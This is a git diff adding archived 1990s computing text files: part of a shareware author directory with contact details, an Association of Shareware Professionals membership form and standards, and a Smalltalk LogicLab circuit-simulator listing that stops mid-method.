+Fax: +354-1-28801 +Other info: + + +Key: Smetana, Rob +Author: Rob W. Smetana +Program: Pro~Formance Data Tool 2-gig editor dBASE/EBCDIC/ASCII +Company: Pro~Formance +Email: 72117.1360@compuserve.com +WWW: +Address: 132 Alpine Terrace, San Francisco CA 94117, USA +Voice: (415) 863-0530 +BBS: +Fax: (415) 522-1347 +Other info: Author of over 20 shareware programs + + +Key: Smith, David +Author: David Smith +Program: AUTOMATED INTERNET +Company: AV Technologies +Email: physics@computek.net +WWW: +Address: 1104 Mason Drive, Hurst, TX 76053, USA +Voice: 817-282-2928 +BBS: (214) 641-6292 +Fax: +Other info: + + +Key: Smith, Harry +Author: Harry J. Smith +Program: VPCalc - Variable Precision floating decimal calculator +Company: Litton Computer Services +Email: HJSmith@ix.netcom.com +WWW: +Address: 19628 Via Monte Dr., Saratoga, CA 95070-4522, USA +Voice: 1-(408) 741-0406 +BBS: +Fax: +Other info: + + +Key: Smith, Samuel +Author: Samuel H. Smith +Program: HS/Link bidirectional file transfer protocol +Company: The Tool Shop +Email: 71150.2731@compuserv.com +WWW: +Address: P.O. Box 4808, Panorama City, CA. 91412, USA +Voice: (818) 891-4228 +BBS: (818) 891-1344 +Fax: (818) 891-4228 +Other info: + + +Key: Spielbusch, Stan +Author: Stan Spielbusch +Program: SuperDIR directory util w/DB formatting, etc. +Company: Cottonwood Software +Email: 75264.1630@compuserve.com +WWW: +Address: P.O. Box 6546, Leawood, KS 66206 USA +Voice: (913) 663-3022 +BBS: +Fax: (913) 663-3747 +Other info: + + +Key: Starr, David +Author: David Starr +Program: Most popular sharebook: "1984 - Invasion of PC Privacy" +Company: Common Law Service Center +Email: starrd@iia.org +WWW: +Address: 9016 Wilshire Blvd, #231, Beverly HIlls, California, USA +Voice: (310) 859-7700 +BBS: (310) 208-2014 offline until 9/94 +Fax: (310) 208-2005 +Other info: Creator of Patriot series "ShareBooks"(tm) + + +Key: Stern, Marc +Author: Marc Stern +Program: XSET - enhanced set instruction +Company: +Email: stern@mble.philips.be +WWW: +Address: Av. de la Basilique 376 b.19 - 1080 Bruxelles - Belgium +Voice: (32.2) 525.63.32 - (32.2) 427.98.52 +BBS: +Fax: +Other info: + + +Key: Stewartson, Ian +Author: Ian Stewartson +Program: Korn/Bourne Shell for MS-DOS and OS/2 +Company: Data Logic Limited +Email: istewart@datlog.co.uk +WWW: +Address: Queens House, Kymberley Road, Harrow, Middlesex, HA1 1YR, UK. +Voice: +44 81 863 0383 +BBS: Not available +Fax: +44 81 861 2010 +Other info: + + +Key: Stiller, Wolfgang +Author: Wolfgang Stiller +Program: Integrity Master anti-virus and data integrity system +Company: Stiller Research +Email: 72571.3352@compuserve.com +WWW: +Address: 2625 Ridgeway St., Tallahassee, FL 32310-5169 USA +Voice: 904-574-0920 +BBS: 904-386-8693 +Fax: 904-575-7884 +Other info: orders: 1-800-788-0787 (ASG) + + +Key: Stone, Chris +Author: Chris Stone +Program: BBS List Database Door - Door program for BBS's +Company: High Mountain Software +Email: cstone@hms.com, Fidonet: Chris Stone 1:104/825.0 +WWW: +Address: 389 Brookside Drive, Bailey, CO 80421, USA +Voice: (303) 838-2386 +BBS: (303) 674-0147 +Fax: n/a +Other info: Anonymous ftp from ftp.csn.net in dir hms. + + +Key: Strevel, Christian +Author: Christian `Fantasma' Strevel +Program: InvDsk // The Software Database +Company: CC+Soft.Inc +Email: ggonzale@rsservb.cem.itesm.mx +WWW: +Address: Guerrero #343, Ent. D-109, Mexico DF 06900, MEXICO +Voice: (011) 525-583-72-68 +BBS: (011) 525-659-10-79 +Fax: (011) 525-583-72-68 (please contact me first) +Other info: + + +Key: Stroem, Henrik +Author: Henrik Stroem +Program: HS.COM, Boot sector virus detection and repair program +Company: Stroem System Soft +Email: hstroem@pvv.unit.no +WWW: +Address: Husebyveien 58c, 7078 Saupstad, Norway +Voice: +BBS: +Fax: +Other info: Anti (boot) virus researcher and assembly-l programmer + + +Key: Summers, Peter +Author: Peter Summers +Program: MUFUSION, Microfusion MF30 terminal emulator +Company: Cardiology Dept, Royal Melbourne Hospital +Email: U5533129@ucsvc.ucs.unimelb.edu.au +WWW: +Address: Cardiology Dept, Royal Melboure Hospital, Australia, 3050 +Voice: (+61 3) 342 8727 +BBS: +Fax: (+61 3) 347 2808 +Other info: + + +Key: Szentesi, Zoltan +Author: Zoltan Szentesi +Program: ZOOM, A General 256C drawing prg. +Company: none yet +Email: Szentesiz@pmmf.hu +WWW: +Address: 7800 Siklos Korvin str. 7 Hungary +Voice: 00-36-72-351-757 +BBS: +Fax: +Other info: Interests: graphics,networks,pacsal,c++,new methods + + +Key: Tassle (Van Tassle), Ray +Author: Ray Van Tassle +Program: WIZ-fast, multidisk file filder +Company: +Email: rayvt@comm.mot.com +WWW: +Address: 1020 Fix Run Lane/Algonquin, Il. USA 60102 +Voice: (708)658-4941 +BBS: (708)854-1696 +Fax: +Other info: + + +Key: Taylor, Patrick I. +Author: Patrick Taylor +Program: UFI Universal File Information for batch files +Company: Andrologic CMN. +Email: exuptr@exu.ericsson.se +WWW: +Address: 3308 Lanarc, Plano, TX 75023, Sweden +Voice: 214-596-2760 +BBS: The Sounding Board BBS +1 214 596 2915 +Fax: +Other info: Also: CPDISK, ROOTER, CP, XORT, TXTSPLIT, UUMAKE + + +Key: Thomson, Douglas +Author: Douglas (Doug) Thomson +Program: TeleReplica Remote Control of PC +Company: Monash University, Gippsland Campus +Email: doug@giaeb.cc.monash.edu.au +WWW: +Address: MUGC, Switchback Rd, Churchill, Victoria 3842, AUSTRALIA +Voice: +BBS: +Fax: +61-51-226738 +Other info: + + +Key: Toikkanen, Tarmo +Author: Tarmo Toikkanen +Program: Controlled Copy, advanced DOS file copier +Company: +Email: ttoikkan@gamma.hut.fi, 100523.2223@compuserve.com +WWW: +Address: Ruusulankatu 19 A 26, 00250 Helsinki, Finland +Voice: +358-0-493 169 +BBS: +Fax: +Other info: Registration via internet accepted + + +Key: Tolliver, James +Author: James (Jim) Tolliver +Program: MEG Graphical sysinfo +Company: +Email: JTJTJTJT@AOL.COM or 76516.1246@Compuserve.COM +WWW: +Address: P.O. Box 4071, Stamford CT, 06907 USA +Voice: (203) 964-5082 +BBS: +Fax: +Other info: Member ASP + + +Key: Tong, Ka +Author: Ka Iok Tong (aka Kent Tong) +Program: Freeman Installer & Uninstaller +Company: Sydney University +Email: tongk@archsci.arch.su.edu.au +WWW: +Address: Box 20, Sydney University, NSW 2006, Australia +Voice: (61)(2)2116314 +BBS: +Fax: (61)(2)2116314, same as voice +Other info: + + +Key: Torgersen, Knut +Author: Knut Torgersen +Program: REMIND - A mind jogger for important dates and events +Company: +Email: knutt@ifi.uio.no, knutt@softpoint.no +WWW: +Address: Lauritz Hervigs vei 105A, N-3035 DRAMMEN, Norway +Voice: +47 32 81 97 53 +BBS: +Fax: +47 32 81 97 53 (Fax modem! Call first!) +Other info: + + +Key: Tschirner, Tim +Author: Tim Tschirner +Program: The LJ4 Utility - Quickly Changes LaserJet 4 Printer Settings +Company: TASsoft +Email: ittschir@techfak.uni-bielefeld.de +WWW: +Address: Friedrich-Ebert-Str. 13, 33602 Bielefeld, Germany +Voice: +49-521-121681 +BBS: +Fax: +Other info: Once registered, all future updates are free + + +Key: Uberto, Franck +Author: Franck Uberto +Program: DIXCOPY (one pass copyer for std & ext. formats) +Company: ESRF +Email: uberto@esrf.fr +WWW: +Address: BP 220, 38043 GRENOBLE Cedex, FRANCE +Voice: +BBS: +Fax: +Other info: + + +Key: Vandenberg, Rick +Author: Rick Vandenberg +Program: V-MailServer MSDOS-based mail server +Company: Vandenberg Systems Research +Email: rick@vsystem.wimsey.bc.ca +WWW: +Address: 103-1016 West 12th Avenue, Vancouver, BC, Canada V6H 1L3 +Voice: (604) 737-2532 +BBS: +Fax: +Other info: + + +Key: Veerman, Rene +Author: Rene "Lowlevel" Veerman +Program: Textgraph tp7 unit - textmode unit, with tph +Company: Syntax Terror Software +Email: lowlevel@xs4all.nl +WWW: +Address: Calkoengracht 21, 1131 ZM Volendam, Holland +Voice: +31-2993-63417 +BBS: +Fax: +Other info: + + +Key: Veldman, Frans +Author: Frans Veldman +Program: TBAV Thunderbyte Anti Virus Utilities +Company: ESaSS B.V. +Email: Veldman@ESaSS.iaf.nl +WWW: +Address: P.o. box 1380, 6501 BJ Nijmegen, The Netherlands +Voice: +31-80-787881 +BBS: +31-85-212395 +Fax: +31-80-789186 +Other info: + + +Key: Vias, John +Author: John Vias +Program: Snooper, a powerful system information utility +Company: Vias and Associates +Email: 72260.1601@compuserve.com +WWW: +Address: P.O. Box 8234, Gainesville, FL 32605, USA +Voice: (800) 332-8234 +BBS: (904) 335-7289 +Fax: (904) 332-4951 +Other info: Tech support and international calls: (904) 332-8234 + + +Key: Vries (de Vries), Nico +Author: Nico E de Vries +Program: UltraCompressor II +Company: AIP-NL +Email: desk@aip.nl; 100115,2303; 2:281/713.1 +WWW: +Address: P.O. Box 1432, 3430 BK, Nieuwegein, The Netherlands +Voice: +31-(0)30-662107 +BBS: +31-(0)3402-55707 +Fax: +31-(0)30-616571 +Other info: + + +Key: Vuorenmaa, Markku +Author: Markku Vuorenmaa +Program: Locate - file finder +Company: +Email: Markku.Vuorenmaa@uta.fi or csmavu@uta.fi +WWW: +Address: Mikkilantie 13, 62100 Lapua, FINLAND +Voice: +BBS: +Fax: +Other info: + + +Key: Vygonets, Vadim +Author: Vadim (Vadik) Vygonets +Program: Universal Undo -- a universal batch unpacker +Company: Hebrew University of Jerusalem, Israel +Email: vadik@cs.huji.ac.il +WWW: +Address: 29/32 Colombia st. Jerusalem Israel +Voice: ++972-2-412694 +BBS: +Fax: +Other info: + + +Key: Vyncke, Eric +Author: Eric Vyncke +Program: NetCC Network Carbon Copy +Company: Network Research Belgium +Email: vyncke@nrb.be +WWW: +Address: Parc Industriel des Hauts-Sarts B-4040 Herstal Belgium +Voice: +32.41.40.72.11 +BBS: +Fax: +32.41.48.11.70 +Other info: anon ftp to aix1.segi.ulg.ac.be in /u/ftp/nrb + + +Key: Walsh, Norm +Author: Norman (norm) Walsh +Program: Sfware (font management, information, special effects) +Company: Small Planet Software +Email: walsh@cs.umass.edu +WWW: +Address: #42I Southwood Apts, Amherst MA 01002, USA +Voice: (413) 256-8527 +BBS: N/A +Fax: N/A +Other info: Also available: TeX font utils, MergeSFP, SFP2Auto + + +Key: Walter, Alexander +Author: Alexander Walter +Program: FONTEDIT, Font editor for HP LaserJet bitmapped fonts +Company: Alexander Walter Co. +Email: 76500.1423@compuserve.com +WWW: +Address: 182 ILER Dr., Middletown, NJ. 07748, USA +Voice: (800) 262-0827, (908) 949-0507 or (908) 671-5080 +BBS: none +Fax: none +Other info: Version also available for editing DeskJet fonts + + +Key: Weatherley, Rhys +Author: Rhys Weatherley +Program: UW/PC multi-window terminal prog & Helldiver newsreader +Company: School of Computing Science, Queensland University of Technology +Email: rhys@fit.qut.edu.au +WWW: +Address: School of Computing Science, QUT, Brisbane QLD 4000, Australia. +Voice: +BBS: +Fax: +Other info: Former comoderator of MS-DOS FTP site list /pc/pd2/moder*.zip + + +Key: Weinbeck, Gene +Author: Gene Weinbeck +Program: FundRaiser Basic donor management for nonprofits +Company: Professional Support Software +Email: edgewalk@ios.com, 72077,1015@compuserve.com +WWW: +Address: PO Box 901, West Plains, MO 65775 USA +Voice: (417) 256-4280 +BBS: +Fax: (417) 256-6370 +Other info: ASP author member + + +Key: Weinstein, Iram +Author: Iram Weinstein +Program: 4EDIT, 4ZIP, USEMGR +Company: XD Systems +Email: 70741.3711@compuserve.com iramw@trg1.saic.com +WWW: +Address: 1014 Shipman Lane, McLean, VA 22101 USA +Voice: (703) 821-3215 +BBS: +Fax: +Other Info: The programs are utilities for 4DOS + + +Key: Whitmore, Stuart +Author: Stuart J. Whitmore +Program: UniMessage BBS utility door +Company: UniNova Services Corporation +Email: stuart.whitmore@uninova.com +WWW: +Address: PO Box 900, Ellensburg, WA 98926, USA +Voice: (509) 925-3894 +BBS: (509) 925-3893 +Fax: (509) 925-3893 +Other info: + + +Key: Windl, Ulrich +Author: Ulrich Windl +Program: D2D Professional Disk Copy Program +Company: University of Regensburg +Email: Ulrich.Windl@rz.uni-regensburg.de +WWW: +Address: DV-med, Franz-Josef-Strauss-Allee 11, D-93042 + Regensburg, Germany +Voice: 49 941 944-5879 +BBS: +Fax: 49 941 944-5882 +Other info: + + +Key: Wisan, Richard +Author: R. N. (Dick) Wisan +Program: PrnSet & Friends universal printer setter & Text File Manicure Kit +Company: +Email: WISANR@hartwick.edu +WWW: +Address: 37 Clinton Street, Oneonta, NY 13820, USA +Voice: (607) 432-4133 +BBS: +Fax: +Other info: + + +Key Wolfe, Robert +Author: Robert A. Wolfe +Program: StaTutor: A tutorial for statistical concepts. +Company: Biostatistics, University of Michigan. +Email: bobwolfe@umich.edu +WWW: +Address: Biostatistics SPH, Univ. Michigan, Ann Arbor, MI 48109, USA +Voice: (313) 936-0997 +BBS: +Fax: (313) 763-2215 +Other info: + + +Key: Woods, Jeff +Author: Jeff Woods +Program: Telix Communications software for DOS and Windows +Company: deltaComm Development, Inc. +Email: jeff.woods@delta.com, 71035.2167@compuserve.com +WWW: +Address: PO Box 1185, Cary, NC 27512, USA +Voice: (919) 460-4556 +BBS: (919) 481-9399 +Fax: (919) 460-4531 +Other info: (800) 859-8000 for orders only + + +Key: Woods, Rob +Author: Rob Woods +Program: BaseBall Card Stats +Company: Purple Six Fingered Fist *PSFF* +Email: woodsrg@newton.ccs.tuns.ca +WWW: +Address: 28 Beaverbank Rd.,Nova Scotia, Canada, B4E 1G5 +Voice: 864-3015 +BBS: N/A +Fax: N/A +Other info: + + +Key: Wriedt, Dirk +Author: Dirk Wriedt +Program: ARV intelligent file archival&database, ARVxxx.ARJ +Company: +Email: dirkw@toppoint.de +WWW: +Address: Kirsebek 15, D-24376 Kappeln, Germany +Voice: +49-431-180413 +BBS: +Fax: +Other info: + + +Key: Wunderlich, Jeff +Author: Jeff Wunderlich +Program: AURORA text editor, huge capacity, very fast +Company: Aurora Terra +Email: 71702.1025@compuserve.com +WWW: +Address: P.O. Box 34275, Bethesda MD, USA +Voice: (301) 468-2255 +BBS: (301) 230-1214 +Fax: +Other info: + + +Key: Zitterkopf, John D. +Author: John D. Zitterkopf +Program: The HardDisk Accomplice +Company: ZittWare +Email: jdz1@Ra.MsState.Edu +WWW: +Address: 940 N. Jackson St. #7D, Starkville, MS 39759, USA +Voice: +BBS: Metro City BBS (601)897-2031 [8-N-1] +Fax: +Other info: Additional address: Zitt@aol.com diff --git a/textfiles.com/computers/autpub.frm b/textfiles.com/computers/autpub.frm new file mode 100644 index 00000000..e460d12d --- /dev/null +++ b/textfiles.com/computers/autpub.frm @@ -0,0 +1,102 @@ + ASP Membership Application -- Author: _ Publisher _ (Select one) + + Your Name............. ______________________________ + Company Name.......... ______________________________ + Mailing Address....... ______________________________ + P.O. Box.............. ____________________ + City.................. ____________________ + State, Cntry, Zip..... __ _______________ __________ + Phone, day............ ______________ + Phone, evenings....... ______________ + Contact Phone.. ______________ (Optional - See AUTPUB.TXT) + CompuServe i.d... ___________ + MCI & Other...... ____________________ + FAX ............. ____________________ + Mailing List OK.. __ Yes __ No + + Product Name.... ______________ Price _______ + Description..... _______________________________________________________ + _______________________________________________________ + _______________________________________________________ + Platform..... IBM ___ Mac ___ Other (specify) ___ + +NOTE: You should submit your documentation as it WILL appear after you +have been accepted by the ASP. + +Where is your support policy described to shareware users? + ________________________________________________________________________ +Briefly describe your support policy: + ________________________________________________________________________ + ________________________________________________________________________ + +Does your documentation clearly describe how to register, what is provided +to registered users, and how much registration costs? __ Yes __ No + +Where does the Ombudsman statement appear in your product? + ________________________________________________________________________ + + +Is the Registered Version of this product identical to the Freely +Distributed Version? __ Yes __ No. If No, READ THE INSTRUCTIONS and +explain ALL differences below, and include a copy of the registered version +with your application. + +Registration Reminder Screens (RRS) + Number of Screens... ____ + Location in Program. _________________________________________________ + +Sample Files + Name and Size....... _________________________________________________ + Description......... _________________________________________________ + _________________________________________________ + +Tutorial and Additional Explanatory Material + Number/Size Files... _________________________________________________ + Description......... _________________________________________________ + _________________________________________________ + +Small Version / Large Version + Size of Small Vers.. _____ Size of Large Vers.. ______ + Location and Cost of Large Version: __________________________________ + +Unrelated Bonus Utilities and/or Convenience Utilities + Name and Size....... _________________________________________________ + Description......... _________________________________________________ + _________________________________________________ + +Other Differences + Source Code in Registered(not Freely Distributed)version? __ Yes __ No + Board Waiver Sought For ______________________________________________ + +Is there an Non-Shareware Version (NSV) of this product? __ Yes __ No +(If Yes, include a copy of the NSV with your application.) + +Please list the latest versions of any other software you have available for +user evaluation -- whether Shareware, Freeware, Demoware or Otherware. + ________________ _________________ ______________ ____________________ + ________________ _________________ ______________ ____________________ + +I certify that the above information is correct; that I will abide by the +standards of the ASP; that if I should ever decide to no longer abide by +those standards or by new standards which the ASP may adopt in the future, +I will cancel my membership immediately; that the ASP may cancel my +membership using criteria and procedures specified in the bylaws; and that +upon cancellation of membership by either party, I will discontinue using +any materials, logos, claims of membership, or other benefits which are +intended solely for members of the ASP. + +Signed:_____________________________ Date: ____________ + + + +------------------------------------------------------------------+ + | P.S. - We can now accept Master or Visa card payments. Fill out | + | the following ONLY if you are making payment by MC or Visa. | + | | + | Master Card [ ] Visa Card [ ] Number ______ ______ _____ ______ | + | | + | Name on the Card (print) _______________________________________ | + | | + | Expires ____/____ Signature ___________________________________ | + +------------------------------------------------------------------+ +Rev: 19 Nov 1993 + \ No newline at end of file diff --git a/textfiles.com/computers/autstd.txt b/textfiles.com/computers/autstd.txt new file mode 100644 index 00000000..4337528a --- /dev/null +++ b/textfiles.com/computers/autstd.txt @@ -0,0 +1,272 @@ + ASP Membership Requirements + +The following are the general standards that ALL ASP authors (full members) +have agreed to follow. Each was passed by at least a 2/3 vote of those +members voting and is binding on all authors. They consist of a support +policy, a policy on payments, a policy on no crippled software, an +Ombudsman policy and some miscellaneous items: + + + **** ASP SOFTWARE SUPPORT POLICY **** + +1. All ASP members' shareware products must provide support (included in the +purchase price) for a minimum of three months from the date of registration. +If the support is by telephone, there may be a limitation on BOTH the total +connect time and the period after purchase during which it is available +without additional cost so long as the connect time is at least 30 minutes +during the required three months. Support may be provided for a fee after +this initial period has elapsed. The support policy must be clearly stated in +the shareware documentation. + +2. Support during the initial period may be one or more of the following: + + - mail support + + - telephone support (if this is the only support provided, at a + minimum an answering machine must be available 4 hours per day; this + support may be limited to thirty minutes of connect time at the + option of the author) + + - for communications products, or ones associated to a communication + product by BBS or major communications service + + - by any alternate method approved by the Board of Directors by a two + thirds vote (of those directors voting) + +3. The minimum level of support required by this policy involves answering +questions and fixing serious bugs during the minimum three month period. For +problems involving a specific hardware or software environment or feature, the +author may choose not to modify the program. In that case, if the report is +within three months after purchase, then the author shall offer to refund the +user's purchase price. + +4. Any money sent to an author to register an unsupported product shall be +promptly returned with an explanation that the product in question is no +longer supported. + +5. Known incompatibilities with other software or hardware and major or +unusual program limitations are noted in the documentation that comes with +the shareware (evaluation) program. + + + + **** ASP REGISTRATION PAYMENT POLICY ***** + +1. The Documentation must clearly describe how to register the product and +what goods and/or services the user will receive for registering. + +2. Fees must be expressed in fixed monetary amounts. Voluntary payments or +contributions may not be solicited, although phrasing such as "if you use +and like this product, please register" is allowed. + +3. Multiple levels of registration may be set, as long as each level +individually satisfies the above two requirements. + + + **** ASP POLICY ON NO CRIPPLING **** + +The principle behind shareware is "try before you buy." ASP believes that +users have a right to try a fully functioning shareware program in their +regular computing environment. Accordingly, ASP authors agree that: + + (1) The executable files (and/or items linked in with executables) + in their shareware and registered versions will be the same (with + the exceptions noted below) + + (2) All the program's features will be fully documented. + + (3) Registration encouragement procedures which in the judgment of + the Board are either unreasonable or unprofessional are not allowed. + + Registration Reminder Screens should (if used): + + 1) be displayed no more than twice each time the program + runs (or twice per day for long-running programs such as + TSR's). + + 2) not require more than two keystrokes to bypass. + + 3) not have a forced minimum display time of more than three + seconds. In other words, the RRS itself should not take + control of the computer away from the user for more than + three seconds. + + Practices such as creating undocumented hidden files or printing + a registration form without the user's knowledge or consent are + prohibited. It is NOT necessary to have any of the above as a + simple "Strike Any Key To Continue" is the least objectional to + the user. + + (4) Solicitation of sales of a non-shareware version (NSV) of a + shareware program may be made in the evaluation version only if it + meets the following guidelines: + + (a) Features of the NSV not in the shareware version must not be + detailed in the body of the documentation. An appendix or + separate file listing the features may be used. + + (b) The shareware version may not present any features of the NSV + during its operation such as in stubbed-out menus or in on-line + help. A solicitation of the NSV and its features may be + presented in any Registration Reminder Screens and on order + forms. + + (c) The names of the NSV and the shareware program must be + distinctly different. Suffixes such as 'Plus', 'Pro', + 'Gold', 'LAN', etc. meet this distinction. Numeric version + or suffix numbers do not meet this distinction. + + (d) The shareware version may not be designed or implemented in + such a fashion that, in the opinion of 60% of the Board of + Directors, it gives the user the impression that the + shareware version's major purpose is to sell copies of the NSV. + + +Exceptions to a strict interpretation of this policy are as follows: + + - to save disk space, tutorial and additional explanatory + material may be left out of the shareware documentation. + + - the shareware version may have registration encouragement + procedures absent from the registered version (or which can be + disabled with a code only provided to registered users). + + - the registered version may include sample files not included + in the shareware version. + + - if source code is offered with the registered version, + it may be withheld from the shareware version. + + - the author may provide two shareware versions: one a small + version which the author designates the distributed version + in normal circumstances (e.g. language tools in C only + available in one model) so long as the full shareware version + is available from some public source (possibly for a small + distribution fee) and may be copied for trial purposes. + The small version's documentation must clearly describe + how users may obtain the full shareware version. + + - registered users may be provided bonus utilities unrelated to + (and which do not change) the basic functionality of the program + + - registered users may be given utilities which provide a + convenience but which are not essential + + - exceptions approved by the ASP board of directors + by a 60% vote of those voting + + - It is an acceptable registration incentive to market the first + product of a series as shareware and use the remaining products as + registration incentives, so long as the remaining products are + merely "more of the same" when compared to the first product. The + author may charge a single registration fee for the set, or may use + varying levels of registration to allow customers to obtain the + original product and/or remaining products. + + + **** ASP OMBUDSMAN POLICY **** + +1. The board shall set up the office of Ombudsman and appoint someone to + that position. The Ombudsman's sole role shall be to mediate disputes + between ASP members and their customers. The Ombudsman shall report + to the board situations where he feels board action or knowledge is + appropriate. + +2. All ASP members and vendor associate members are required to cooperate + with the Ombudsman when approached by him/her. + +3. The Shareware version of any shareware program produced by ASP author + members must contain the following text as part of some file on the + disk. (The shareware version means the one intended for trial use). + + "This program is produced by a member of the Association of Shareware + Professionals (ASP). ASP wants to make sure that the shareware + principle works for you. If you are unable to resolve a + shareware-related problem with an ASP member by contacting the member + directly, ASP may be able to help. The ASP Ombudsman can help you + resolve a dispute or problem with an ASP member, but does not provide + technical support for members' products. Please write to the ASP + Ombudsman at 545 Grover Road, Muskegon, MI USA 49442-9427, Fax + 616-788-2765, or send a CompuServe message via CompuServe Mail to ASP + Ombudsman 70007,3536." + +4. Inclusion of Ombudsman statement. + + a. The Ombudsman statement shall be included in the shareware version + in a location clearly accessible to the evaluator. + + b. Any registered versions which contain reference to the ASP or use + the ASP logo must contain the Ombudsman statement but they may be + in a written form rather than on disk. + + c. If the ASP logo or name is used by any ASP approved vendor in any + ads/catalogs etc , then that vendor must include the OMB + statement with their catalogs and newsletters and is encouraged + to include it with any disks sold containing ASP member programs. + + d. Members are free to include the Ombudsman statement in printed + documentation, ads and other mailings if they wish. + +5. The first sentence may be replaced by " is a member of + the Association of Shareware Professionals (ASP)." If a member's + company qualifies under the company name policy, the company name may + be used instead of . + +6. ASP approved vendors must include the following statement with their + catalogs and newsletters and are encouraged to include it with all + disks sold: + + "Company X is an Approved Vendor and a member of the Association + of Shareware Professionals (ASP). ASP wants to make sure that the + shareware principle works for you. If you are unable to resolve + a shareware-related problem with an ASP member by contacting the + member directly, ASP may be able to help. The ASP Ombudsman can + help you resolve a dispute or problem with an ASP member, but does not + provide technical support for members' products. Please write to the + ASP Ombudsman at 545 Grover Road, Muskegon, MI USA 49442-9427, Fax + 616-788-2765, or send a CompuServe message via CompuServe Mail to ASP + Ombudsman 70007,3536." + +7. The Ombudsman statement may not be hidden in a file or other manner + which 60% of the board of directors regards as obscure. + +8. ASP approved BBS Systems must include the following statement as a + system bulletin (or as a downloadable file, if and only if an online + bulletin is not feasible), Which is to be accessible by all callers: + + " is an Approved BBS and a member of the Association + of Shareware Professionals (ASP). ASP wants to make sure that + the shareware principle works for you. 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Ayers + + +[LISTINÇ ONE] + +Object subclass: #LogicLab + instanceVariableNames: + 'devices signals switches clashes changed topPane analyzer breadboard + listSelector currentComponent ' + classVariableNames: '' + poolDictionaries: + 'FunctionKeys CharacterConstants ' ! + +!LogicLab class methods ! +description + "Answer a String describing the + application and version." + ^'LogicLab (Version 1.0 -- 06/26/88)'.! +new + "Answer an initialized LogicLab application." + | logicLab | + logicLab := super new. + logicLab initialize. + ^logicLab.! ! + +!LogicLab methods ! +addComponent: aComponent + "Add aComponent to the circuit description. + If there is an error, answer nil; otherwise + answer aComponent." + | name | + name := aComponent name. + name size == 0 + ifTrue: [ + " + User is installing -- get a name. + " + name := self getNewName. + name isNil + ifTrue: [^nil]. + aComponent name: name] + ifFalse: [ + " + A name has been supplied -- this implies + that the component is being installed from + a file. Need to check for a clash with + an existing name. + " + ((self componentNamed: name) isNil) + ifFalse: [ + " + Had a name clash -- get a synonym + from the user and stash both of them + away in the clashes table. Then + rename the component. + " + name := self getNewName. + name isNil Š ifTrue: [^nil]. + clashes + at: aComponent name + put: name. + aComponent name: name]]. + changed := true. + aComponent isDevice + ifTrue: [devices add: aComponent] + ifFalse: [ + aComponent isSignal + ifTrue: [signals add: aComponent] + ifFalse: [ + switches add: aComponent. + analyzer isNil + ifFalse: [analyzer addSwitch: aComponent]]]. + ^aComponent.! +allNames + "Answer an array of all of the + names of installed components." + ^((self deviceNames), (self signalNames), (self switchNames)).! +analyzer: aModel + "Set the LogicAnalyzer Application model + to aModel." + analyzer := aModel.! +breadboardList + "Answer an array of strings according to the + current list selector." + listSelector isNil + ifTrue: [listSelector := #listDevices]. + ^(self perform: listSelector).! +breadboardMenu + "Private -- answer the menu that processes + breadboard functions." + MenuPosition := Cursor position. + ^(Menu + labels: ('Load\Save\Erase\List\', + 'Install\Connect\Remove\Disconnect\', + 'Simulate\', + 'Quit') withCrs + lines: #(4 8 9) + selectors: #(load save erase list + install connect remove disconnect + run + quit)).! +changed + "Answer true if the circuit has changed." + ^changed.! +changed: aBoolean + "Set the circuit-changed flag to aBoolean." + changed := aBoolean.! +close + "Close the LogicLab breadboarding window." + topPane dispatcher deactivateWindow closeWindow.! +closeIt + "Close the breadboard application window." Š self close.! +componentNamed: aName + "Answer the component (device, signal, or switch) + whose name is aName. If no component can be found + answer nil." + | realName | + realName := aName. + clashes isNil + ifFalse: [ + (clashes includesKey: aName) + ifTrue: [realName := clashes at: aName]]. + devices do: [:aDevice| + (aDevice name = realName) + ifTrue: [^aDevice]]. + signals do: [:aSignal| + (aSignal name = realName) + ifTrue: [^aSignal]]. + switches do: [:aSwitch| + (aSwitch name = realName) + ifTrue: [^aSwitch]]. + ^nil.! +componentTypeMenu: selectorArray + "Answer a user-selected action for a + component type." + ^((Menu + labels: 'Device\Signal\Switch' withCrs + lines: #() + selectors: selectorArray) popUpAt: MenuPosition).! +connect + "Make a user-specified connection." + | from to | + from := self getNode. + from isNil + ifTrue: [^nil]. + to := self getNode. + to isNil + ifTrue: [^nil]. + from connect: to. + changed := true. + currentComponent := from model. + listSelector := #listComponentConnections. + breadboard update.! +description + "Answer a string with a description of the receiver." + ^(self class description).! +deviceNames + "Answer a collection of all of the + names of installed devices." + | list | + list := OrderedCollection new: (devices size). + devices do: [:aDevice| list add: aDevice name]. + ^list.! +devices + "Answer the list of installed devices." + ^devices.! Šdisconnect + "Remove a user-specified connection." + | node | + node := self getNode. + node isNil + ifTrue: [^nil]. + node disconnect. + changed := true. + currentComponent := node model. + listSelector := #listComponentConnections. + breadboard update.! +erase + "After user-verification, erase + the circuit description." + Cursor offset: MenuPosition. + (self verify: 'Erase circuit description?') + ifFalse: [^nil]. + self eraseCircuit. + listSelector := #listDevices. + changed := true. + breadboard update.! +eraseCircuit + "Erase the circuit description." + devices do: [:aDevice| + self removeComponent: aDevice]. + signals do: [:aSignal| + self removeComponent: aSignal]. + switches do: [:aSwitch| + self removeComponent: aSwitch]. + self initialize.! +getExistingComponent + "Answer a user-specified component." + | name component reply list | + name := self getName. + name isNil + ifTrue: [^nil]. + component := self componentNamed: name. + component isNil + ifFalse: [^component]. + Cursor offset: MenuPosition. + (Menu message: + (name, ' not installed -- select from list?')) isNil + ifTrue: [^nil]. + Cursor offset: MenuPosition. + reply := self componentTypeMenu: + #(deviceNames signalNames switchNames). + Cursor offset: MenuPosition. + reply isNil + ifTrue: [^nil]. + list := self perform: reply. + (list size == 0) + ifTrue: [ + Menu message: 'None installed'. + Cursor offset: MenuPosition. + ^nil]. Š name := VariableMenu selectFrom: list. + name isNil + ifTrue: [^nil]. + name := list at: name. + ^(self componentNamed: name).! +getExistingName + "Answer a user-specified name of + an existing component." + | component | + component := self getExistingComponent. + component isNil + ifTrue: [^nil]. + ^(component name).! +getFile + "Answer a FileStream for a + user-specified filename." + | name | + name := self getFilename. + name isNil + ifTrue: [^nil]. + ^(File pathName: name).! +getFilename + "Answer a user-specified filename." + | name | + Cursor offset: MenuPosition. + name := + Prompter + prompt: 'Enter filename' + default: ''. + Cursor offset: MenuPosition. + ^name.! +getName + "Answer a user-specified name." + | name | + Cursor offset: MenuPosition. + name := + Prompter + prompt: 'Enter component name' + default: ''. + Cursor offset: MenuPosition. + ^name.! +getNewName + "Answer a user-specified name for + a new component." + | name | + Cursor offset: MenuPosition. + name := + Prompter + prompt: 'Enter name for new component' + default: ''. + Cursor offset: MenuPosition. + name 